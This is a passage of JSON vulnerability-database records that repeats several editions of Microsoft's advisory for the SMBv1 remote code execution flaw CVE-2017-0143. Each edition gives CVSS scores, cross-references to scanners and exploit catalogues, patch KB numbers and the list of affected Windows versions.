vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T22:48:26", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012212", "KB4012215", "KB3210720", "KB4012598", "KB4012213", "KB4013429", "KB3205401", "KB4012606", "KB3213986", "KB3210721", "KB3205409", "KB4013198", "KB4012214", "KB3177186", "KB4012216", "KB3212646", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T22:48:26", "differentElements": ["msAffectedSoftware"], "edition": 56}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-18T00:49:58", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012212", "KB4012215", "KB3210720", "KB4012598", "KB4012213", "KB4013429", "KB3205401", "KB4012606", "KB3213986", "KB3210721", "KB3205409", "KB4013198", "KB4012214", "KB3177186", "KB4012216", "KB3212646", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T00:49:58", "differentElements": ["msAffectedSoftware"], "edition": 57}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-18T02:48:09", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", 